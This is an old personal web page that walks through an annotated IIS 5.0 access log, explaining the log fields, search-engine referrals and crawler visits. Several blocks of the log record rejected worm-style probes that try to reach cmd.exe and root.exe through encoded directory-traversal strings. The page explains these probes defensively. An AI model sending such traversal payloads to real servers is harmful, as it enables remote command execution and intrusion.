Microsoft Windows IIS

Riguy Index and Archive:

// An example of an IIS 5.0 log. [The // (commented) parts are not part of this log.]

// IIS logs are located @ C:\WINNT\system32\LogFiles\W3SVC

// Note the many "<Rejected-By-UrlScan>" GET requests. Seen below are many attempts at executing

// "cmd.exe", a not-so-blatant attempt at commandeering my server.

An updated IIS log file can be Seen HERE.

// The 404 error codes mean they did not succeed.

// Much to my dismay, sometimes much of my site traffic is in fact attacks/attempts thereof !

// As you can see, ~ 5 lines below: after the first # sign, we have the obvious name of the server:

// IIS 5.0; then version number; then, the date of the Log itself.

// Next, we have the date/time of arrival of the web surfer/search engine, etc; then the IP address

// This is followed by my local Private IP address of the IIS server; a GET command is issued

// by the browser to retrieve files;

// a 200 code in, i highlighted in white = a successful response from IIS; then, the browser ID/agent, OS, cookie, referer, etc.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-08-29 01:34:16
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent) cs(Cookie) cs(Referer)
2002-08-29 01:34:16 209.53.157.130 - 192.168.1.55 80 GET /bios.html - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+4.0) - http://www.google.ca/search?q=BIOS+meaning&ie=UTF-8&oe=UTF-8&hl=en&meta=
2002-08-29 01:34:16 209.53.157.130 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+4.0) -

// ~ 2 lines above is a reference to the Google search engine. This means the client was "referred"

// to my humble web site by Google. Google "Bots" archived my page on BIOS. It appears h/she

// searched for "BIOS meaning" and got my (again, humble) BIOS meaning page.

// I color-coded in red the key words myself.

http://www.riguy.com/bios.html2002-08-29 02:15:33 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 - - -
2002-08-29 02:15:35 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 - - -
2002-08-29 02:15:38 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:43 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:44 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:46 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:47 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:49 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:51 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:53 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:15:55 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:00 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:04 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:05 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:09 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 02:16:09 12.240.159.214 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 - - -
2002-08-29 03:07:37 202.69.162.8 - 192.168.1.55 80 GET /bios.html - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+95;+DigExt) - http://google.yahoo.com/bin/query?p=Meaning+of+Bios&hc=0&hs=0
2002-08-29 03:07:40 202.69.162.8 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+95;+DigExt) - http://www.riguy.com/bios.html
2002-08-29 03:51:22 203.97.2.243 - 192.168.1.55 80 GET /bios.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.google.co.nz/search?q=bios+meaning&ie=UTF-8&oe=UTF-8&hl=en&btnG=Google+Search&lr=
2002-08-29 03:51:22 203.97.2.243 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/bios.html
2002-08-29 03:52:34 203.97.2.243 - 192.168.1.55 80 GET /index.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/bios.html
2002-08-29 03:52:36 203.97.2.243 - 192.168.1.55 80 GET /pix/helpdskbanner.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/index.html
2002-08-29 03:52:36 203.97.2.243 - 192.168.1.55 80 GET /pix/MCP_c.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/index.html
2002-08-29 03:52:36 203.97.2.243 - 192.168.1.55 80 GET /pix/logo2.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - http://www.riguy.com/index.html
2002-08-29 10:09:31 66.196.73.22 - 192.168.1.55 80 GET /hp1.html - 200 Mozilla/5.0+(Slurp/cat;+slurp@inktomi.com;+http://www.inktomi.com/slurp.html) - -
2002-08-29 10:56:52 217.230.185.24 - 192.168.1.55 80 GET /w2K_steps.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.google.de/search?q=%22data1.msi%22+%2Bdownload+%2BOutlook&ie=UTF-8&oe=UTF-8&hl=de&meta=lr%3Dlang_de%7Clang_en
2002-08-29 10:56:54 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k2.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:54 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k_thingy.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:55 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k1.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:55 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k6.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:56 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k7.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:56 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k3.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:58 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k4.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:59 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k8.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:56:59 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k5.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:00 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k9.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:00 217.230.185.24 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:02 217.230.185.24 - 192.168.1.55 80 GET /pix/w2k9_.jpg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:14 217.230.185.24 - 192.168.1.55 80 GET /email.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/w2K_steps.html
2002-08-29 10:57:14 217.230.185.24 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 304 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/email.html
2002-08-29 10:57:14 217.230.185.24 - 192.168.1.55 80 GET /Templates/yellber.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/email.html
2002-08-29 10:57:40 217.230.185.24 - 192.168.1.55 80 GET /index.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - -
2002-08-29 10:57:40 217.230.185.24 - 192.168.1.55 80 GET /pix/helpdskbanner.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/
2002-08-29 10:57:40 217.230.185.24 - 192.168.1.55 80 GET /pix/logo2.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/
2002-08-29 10:57:40 217.230.185.24 - 192.168.1.55 80 GET /pix/MCP_c.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+DT) - http://www.riguy.com/
2002-08-29 13:04:41 196.2.153.7 - 192.168.1.55 80 GET /hpinstall.html - 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT) - http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%224000tn+drivers%22&spell=1
2002-08-29 13:04:51 196.2.153.7 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT) - http://www.riguy.com/hpinstall.html
2002-08-29 15:48:28 64.45.208.154 - 192.168.1.55 80 GET /tcp.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+Win+9x+4.90) - http://www.google.com/search?q=tcp/ip+not+binding+to+3com+adapter&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=50&sa=N
2002-08-29 15:48:28 64.45.208.154 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+Win+9x+4.90) - http://www.riguy.com/tcp.html
2002-08-29 16:50:08 66.196.65.11 - 192.168.1.55 80 GET /robots.txt - 404 Mozilla/5.0+(Slurp/si;+slurp@inktomi.com;+http://www.inktomi.com/slurp.html) - -
2002-08-29 17:18:03 12.233.30.110 - 192.168.1.55 80 GET /w2K_steps.html - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://google.yahoo.com/bin/query?p=data1.msi+download&b=21&hc=0&hs=0&xargs=0
2002-08-29 17:18:03 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k2.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:05 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k3.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:05 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k4.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:07 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k1.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:07 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k5.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:07 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k_thingy.gif - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:08 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k6.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:08 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k7.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:10 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k8.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:10 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k9.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:11 12.233.30.110 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:18:11 12.233.30.110 - 192.168.1.55 80 GET /pix/w2k9_.jpg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - http://www.riguy.com/w2K_steps.html
2002-08-29 17:25:20 206.41.207.8 - 192.168.1.55 80 GET /index.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Q312461) - http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%222000+pro%22+%22nt+domain%22+%222000+server%22&btnG=Google+Search
2002-08-29 17:25:45 206.41.207.8 - 192.168.1.55 80 GET /pix/logo2.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Q312461) - http://www.riguy.com/
2002-08-29 17:25:45 206.41.207.8 - 192.168.1.55 80 GET /pix/MCP_c.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Q312461) - http://www.riguy.com/
2002-08-29 17:25:48 206.41.207.8 - 192.168.1.55 80 GET /pix/helpdskbanner.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Q312461) - http://www.riguy.com/
2002-08-29 17:48:26 195.215.171.49 - 192.168.1.55 80 GET /virus.html - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - http://search.msn.dk/results.asp?cfg=SMCINITIAL&RS=CHECKED&v=1&srch=5&FORM=AS5&q=EntireNetwork
2002-08-29 17:48:26 195.215.171.49 - 192.168.1.55 80 GET /pix/feather.gif - 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - http://www.riguy.com/virus.html
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:08 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:10 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:11 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 20:52:11 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 - - -
2002-08-29 21:13:12 24.147.129.77 - 192.168.1.55 80 GET /w2k_upgrade.html - 200 Mozilla/4.77+[en]+(Win98;+U) - http://www.google.com/search?q=w2000++w98+dual+boot&hl=en&lr=&ie=UTF-8&start=10&sa=N
2002-08-29 21:13:12 24.147.129.77 - 192.168.1.55 80 GET /Templates/hr1.jpeg - 200 Mozilla/4.77+[en]+(Win98;+U) - http://www.riguy.com/w2k_upgrade.html
2002-08-29 22:40:54 66.196.72.73 - 192.168.1.55 80 GET /att_gns.html - 200 Mozilla/5.0+(Slurp/cat;+slurp@inktomi.com;+http://www.inktomi.com/slurp.html) - -
2002-08-29 22:43:17 66.77.73.63 - 192.168.1.55 80 GET /epo_clt.html - 200 FAST-WebCrawler/3.6+(atw-crawler+at+fast+dot+no;+http://fast.no/support/crawler.asp) - -
2002-08-29 22:43:42 66.77.73.63 - 192.168.1.55 80 GET /smb3.html - 200 FAST-WebCrawler/3.6+(atw-crawler+at+fast+dot+no;+http://fast.no/support/crawler.asp) - -
2002-08-29 22:45:36 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 - - -
2002-08-29 22:45:36 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 - - -
2002-08-29 22:45:36 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:36 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:37 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:37 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:37 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:37 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:38 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:39 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:45:39 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 - - -
2002-08-29 22:49:24 68.46.5.178 - 192.168.1.55 80 GET /index.html - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.google.com/custom?q=Troubleshoot+IIS+Windows+2000+Pro&hl=en&lr=&ie=UTF-8&cof=L:http://www.comcast.net/images/comcastlogo_search.gif;LH:48;LW:176;LC:%23003366;VLC:%23660000;ALC:%23660000;GALT:%23003366;GFNT:%23666666;GIMP:%23660000;AH:left;&start=10&sa=N
2002-08-29 22:49:36 68.46.5.178 - 192.168.1.55 80 GET /pix/helpdskbanner.gif - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/
2002-08-29 22:49:36 68.46.5.178 - 192.168.1.55 80 GET /pix/logo2.gif - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/
2002-08-29 22:49:36 68.46.5.178 - 192.168.1.55 80 GET /pix/MCP_c.gif - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/
2002-08-29 22:50:31 68.46.5.178 - 192.168.1.55 80 GET /iis.html - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/
2002-08-29 22:50:31 68.46.5.178 - 192.168.1.55 80 GET /pix/hr1.jpeg - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0;+T312461) - http://www.riguy.com/iis.html
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 - - -
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 - - -
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:12 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:13 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 - - -
2002-08-29 23:32:14 66.47.251.92 - 192.168.1.55 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 - - -

<snip>

A 'busier' IIS Log

RIGUY IIS PAGE

RIGUY HOME

Search Google for Related Content:

Windows 2003 Server
Vista Upgrade
Samba Server
Windows SMS Server
Mac OS X in a Domain
Distributed File System
Exchange Server Set Up
NT Backup
Network Monitoring
DSL Comparisons
Windows 2000 Upgrade
Terminal Services
Red Hat on a Laptop
Network+ Exam Prep
Windows Perfmon
Exchange Server Synching
Windows IIS for Web
Exchange Global Address
McAfee ePolicy
Using TCPDUMP
Red Hat Linux Updates